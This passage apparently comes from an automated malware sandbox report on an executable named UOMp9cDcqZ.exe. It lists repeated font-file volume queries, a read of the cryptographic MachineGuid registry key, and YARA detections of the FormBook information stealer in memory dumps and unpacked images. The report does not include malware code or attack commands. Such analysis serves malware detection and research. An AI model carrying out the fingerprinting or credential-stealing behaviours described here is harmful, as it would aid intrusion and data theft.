Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE